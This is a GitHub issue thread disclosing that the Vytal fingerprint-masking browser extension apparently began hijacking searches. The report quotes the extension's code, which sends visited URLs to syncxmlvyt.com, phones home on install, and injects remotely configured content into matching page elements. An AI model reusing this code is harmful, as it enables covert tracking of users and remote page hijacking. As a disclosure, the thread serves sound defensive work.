[URGENT] 🚨 Vytal Extension is Now Acting Maliciously

[GiaNTizmO]

trafficstars

🧨 Summary

The Vytal extension has begun exhibiting highly suspicious and malicious behavior.

⚠️ Unfortunately, at the time of issue creation, the redirect was disabled and I have fragmentary data, without taking into account all technical data Without recording the video, I checked that it was the Vytal extension that was doing this - I launched the browser in incognito mode with only the single Vytal extension.

Originally intended to mask browser fingerprinting, the extension now: 1. Intercepts user searches 2. Sends full query URLs to third-party tracking domains 3. Redirects users to suspicious monetization or search hijack domains

This poses a serious privacy and security concern to all users of the extension.

▶️ Video demonstration:

Unfortunately, the recording is not of the best quality. I was planning to re-record the video without additional downloaded plugins, but at the time of creating the issue, the redirect was disabled and now I can't make a new video with a demo.

https://github.com/user-attachments/assets/c2a5c24d-8cae-4cb6-9777-97d6e167a25c

🕵️‍♂️ Observed Behavior

1. When visiting https://www.google.com and searching for something (e.g. test google search text), the extension sends the full query to:

https://syncxmlvyt.com/analytics.php?p=html&u=https%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dtest%2Bgoogle%2Bsearch%2Btext%26...

2. The request contains:

• Full visited URL (u)
• Potentially sensitive query parameters

3. Redirections observed (before they were disabled): *syncxmlvyt.com → finditonlinenow.com → a PDF-themed domain → ends on Yahoo search page

• Behavior resembles search hijacking or ad injection networks

🔬 Code Analysis (from background.bundle.js)

const l = "https://syncxmlvyt.com/";
	async function i(a = !1) {
		const r = `${l}config.php?` + Date.now(),
			{
				config: o,
				configTimestamp: e
			} = await chrome.storage.local.get(["configTimestamp", "config"]);
		if (!a && Date.now() - (e || 0) < 3e5) return o;
		const t = await fetch(r).then(n => n.json());
		return chrome.storage.local.set({
			config: t,
			configTimestamp: Date.now()
		}), t
	}
	i(!0), chrome.runtime.onMessage.addListener((a, r, o) => {
		if (a === "get-config") return i().then(e => o(e)), !0
	}), chrome.runtime.onInstalled.addListener(function(a) {
		a.reason === "install" && fetch(`${l}install.php`)
	})

• On every page visit, the extension fetches a remote configuration.
• The remote config appears to dynamically control behavior.
• Upon install, it phones home via install.php.
• No user consent is requested before sending browser activity externally.

❗ Potential Consequences

• Leak of search terms and browsing data to third-party servers
• Privacy violation: Full query strings sent to unknown external server
• Monetization via hijack: Redirection to monetized or phishing-like pages
• Violation of Chrome Web Store policies:

• Misuse of permissions
• Undisclosed tracking

🔚 Closing Note

This extension has shifted from a privacy tool into a browser hijacker. The community deserves transparency.

[GiaNTizmO]

UPD:

🚨 Malicious DOM Injection via Remote Configuration

Further investigation of the content_script.js in the Vytal extension reveals dynamic DOM manipulation based on external configuration, fetched from https://syncxmlvyt.com/config.php.

📦 Code Snippet:

chrome.runtime.sendMessage("get-config", s => {
		function u(r) {
			return r.replace(/{[\w.]+}/, c => {
				const l = c.substr(1, c.length - 2).split(".").reduce((e, n) => e[n], window);
				return encodeURIComponent(l)
			})
		}
		const h = document.location + "";
		g(() => {
			function r() {
				for (const o of s) new RegExp(o.pattern, "gi").test(h) && [...document.querySelectorAll(o.selector)].filter(t => !t.hasAttribute("skip-element")).forEach(t => {
					const i = t.style.display;
					t.style.display = "none", t.setAttribute("skip-element", !0), fetch(u(o.url)).then(a => a.text()).then(a => {
						const d = a.trim();
						d && (t[o.attr] = d)
					}).catch(() => {}).then(() => t.style.display = i)
				})
			}
			r(), new MutationObserver(() => r()).observe(document.body, {
				childList: !0,
				subtree: !0
			})
		})
	})

🧬 What it does:

• Dynamically loads configuration rules from a remote server (syncxmlvyt.com).
• Each rule includes:
  • A URL pattern to match (e.g., google\.com)
  • A CSS selector (selector)
  • A remote url to fetch replacement content from
  • A target attribute (attr, such as innerText, src, etc.)
• Injects remote content into matching DOM elements.
• Uses a MutationObserver to persistently monitor and reinject on any DOM changes.

🔥 Real-world Impact:

• Remote server (syncxmlvyt.com) controls what content appears on user pages.
• Can be used for:
  • Injecting ads, phishing forms, fake buttons
  • Hijacking PDF links or download buttons
  • Stealth content replacement (e.g., search redirection)
• This behavior is stealthy, dynamic, and policy-violating.

⚠️ Privacy Violation:

• User data such as location.href is interpolated and sent to the remote URL.

This functionality turns Vytal into a remote-controlled content injector — directly violating Chrome Web Store policies on user data privacy and behavior disclosure.

We urge maintainers and the Chrome Web Store review team to investigate immediately.

[kiwiflydream]

[skypoc]

Thanks for the report, that's too bad.

Any malicious behavior related to stealing account cookies and passwords?

[www1z4rd]

I've a created a open source alternative extension:

https://chromewebstore.google.com/detail/fcalilbnpkfikdppppppchmkdipibalb

https://github.com/www1z4rd/cloaq

[PixelMelt]

Thank you for your research into this, seems it was just marked as malware on brave as well

[0zd0]

Was it replaced in the new update? Or what's the problem with building from these source codes?

[HATOSHAH]

I've a created a open source alternative extension:

https://chromewebstore.google.com/detail/fcalilbnpkfikdppppppchmkdipibalb

https://github.com/www1z4rd/cloaq

Thanks bro ♥️♥️